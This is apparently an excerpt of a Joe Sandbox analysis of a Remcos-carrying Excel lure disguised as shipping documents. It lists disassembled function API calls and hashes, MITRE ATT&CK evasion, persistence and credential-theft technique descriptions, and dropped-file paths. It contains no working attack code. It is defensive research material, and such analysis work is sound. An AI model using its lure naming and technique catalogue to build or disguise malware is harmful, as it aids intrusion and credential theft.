Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31

??3@YAXPAX@Z.MSVCRT ref: 0040B12C
memcpy.MSVCRT ref: 0040B159

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@$memcpy$mallocstrlen
String ID:
API String ID: 1171893557-0
Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F

Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004144E7

Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
memset.MSVCRT ref: 0041451A
GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D

Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
malloc.MSVCRT ref: 00417459
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
??3@YAXPAX@Z.MSVCRT ref: 0041747F

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$??3@malloc
String ID:
API String ID: 4284152360-0
Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6

Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00412403
RegisterClassW.USER32(?), ref: 00412428
GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: HandleModule$ClassCreateRegisterWindow
String ID:
API String ID: 2678498856-0
Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9

Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
malloc.MSVCRT ref: 00417407
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
??3@YAXPAX@Z.MSVCRT ref: 00417425

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$??3@malloc
String ID:
API String ID: 4284152360-0
Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5

Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F673
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
strlen.MSVCRT ref: 0040F6A2
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D

Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F6E2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
strlen.MSVCRT ref: 0040F70D
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8

Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 0041477F
wcscpy.MSVCRT ref: 0041479A
CloseHandle.KERNEL32(00000000), ref: 004147C8

Strings

General, xrefs: 00414794

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: wcscpy$CloseHandle
String ID: General
API String ID: 3722638380-26480598
Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669

Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7

SetBkMode.GDI32(?,00000001), ref: 004143A2
SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
SetTextColor.GDI32(?,00C00000), ref: 004143BE
GetStockObject.GDI32(00000000), ref: 004143C6

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759

Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65

Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004134E0
memcpy.MSVCRT ref: 004134F2
GetModuleHandleW.KERNEL32(00000000), ref: 00413505
DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D

Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0040F79E
wcschr.MSVCRT ref: 0040F7AC

Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB

Strings

", xrefs: 0040F7E8

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99

Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040A398
memcpy.MSVCRT ref: 0040A3A8

Strings

%2.2X , xrefs: 0040A38D

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96

Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E770
SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F

Strings

F^@, xrefs: 0040E795

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: MessageSendmemset
String ID: F^@
API String ID: 568519121-3652327722
Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79

Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 004125C3
DeleteObject.GDI32(00000000), ref: 004125E7

Strings

r!A, xrefs: 004125BD

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@DeleteObject
String ID: r!A
API String ID: 1103273653-628097481
Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19

Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
??2@YAPAXI@Z.MSVCRT ref: 0040D108
??2@YAPAXI@Z.MSVCRT ref: 0040D126

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

